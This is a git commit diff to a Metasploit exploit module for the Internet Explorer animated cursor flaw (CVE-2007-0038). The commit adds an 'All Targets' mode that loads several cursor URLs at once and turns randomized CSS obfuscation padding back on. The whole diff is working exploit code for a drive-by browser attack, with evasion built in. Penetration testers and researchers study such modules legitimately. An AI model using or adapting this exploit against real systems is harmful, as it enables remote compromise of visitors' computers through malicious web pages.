This module now defaults to using all targets at once :-)

git-svn-id: file:///home/svn/framework3/trunk@4596 4d416f70-5f16-0410-b530-b9f4589650da
2007-04-01 18:25:14 +00:00 · 2007-04-01 18:25:14 +00:00 · 24ba17aceb
parent e707423987
commit 24ba17aceb
1 changed files with 47 additions and 23 deletions
--- a/modules/exploits/windows/browser/ani_loadimage_chunksize.rb
+++ b/modules/exploits/windows/browser/ani_loadimage_chunksize.rb
@ -71,6 +71,12 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
 			'Platform'       => 'win',
 			'Targets'        =>
 				[
+					#
+					# Use multiple cursor URLs to try all targets at once
+					# This can result in multiple, sequential sessions
+					#
+					[ 'All Targets', { }],
+				
 					#
 					# The following targets use call [ebx+4], just like the original exploit
 					#
@ -117,37 +123,57 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
 	end

 	def on_request_uri(cli, request)
-	
+
+		targ = nil	
 		exts = ['bmp', 'wav', 'png', 'zip', 'tar']
 		gext =  exts[rand(exts.length)]
-		mext = request.uri =~ /\.(...)$/
 		
+		ruri, qstr = request.uri.split('?')
+
+		if (qstr and qstr =~ /.*=(\d+)/)
+			targ = $1.to_i
+		end
+		
+		mext = ruri =~ /\.(...)$/
 		if (not (mext and exts.include?($1)))

 			html =
-				"<html><head><title>"   + rand_text_alphanumeric(rand(128)+4) +
-				"</title></head><body>" + rand_text_english(rand(1024)+1) +
-				"<div style='" +
-					generate_css_padding() +
-					Rex::Text.to_rand_case("cursor") +
-					generate_css_padding() +
-					":" +
-					generate_css_padding() +
-					Rex::Text.to_rand_case("url(") +
-					generate_css_padding() +
-					'"' +
-					get_resource + '/' + rand_text_alphanumeric(rand(80)+16) + ".#{gext}" + 
-					'"' +
-					generate_css_padding() +
-					");" +
-					generate_css_padding() +
-					"'>" +
-					generate_padding() +
-				"</div>"
+				"<html><head><title>" + 
+					rand_text_alphanumeric(rand(128)+4) +
+				"</title>" +			
+				"</head><body>" + rand_text_alphanumeric(rand(128)+1)
+
+			mytargs = (target.name =~ /All Targets/) ? targets : [target]
+	
+			mytargs.each_index do |i|
+				html <<	"<div style='" +
+						generate_css_padding() +
+						Rex::Text.to_rand_case("cursor") +
+						generate_css_padding() +
+						":" +
+						generate_css_padding() +
+						Rex::Text.to_rand_case("url(") +
+						generate_css_padding() +
+						'"' +
+						get_resource + '/' + rand_text_alphanumeric(rand(80)+16) + ".#{gext}" + 
+						"?#{rand_text_alpha(rand(12)+1)}=#{i}" +
+						'"' +
+						generate_css_padding() +
+						");" +
+						generate_css_padding() +
+						"'>" +
+						generate_padding() +
+					"</div>"
+			end
 			
 			send_response_html(cli, html)
 			return
 		end
+		
+		# Set the requested target
+		if (targ and targets[targ])
+			target = targets[targ]
+		end

 		# Re-generate the payload
 		return if ((p = regenerate_payload(cli)) == nil)
@ -250,8 +276,6 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
 	end
 	
 	def generate_css_padding
-		return ''
-		
 		buf =
 			generate_whitespace() + 
 			"/*" +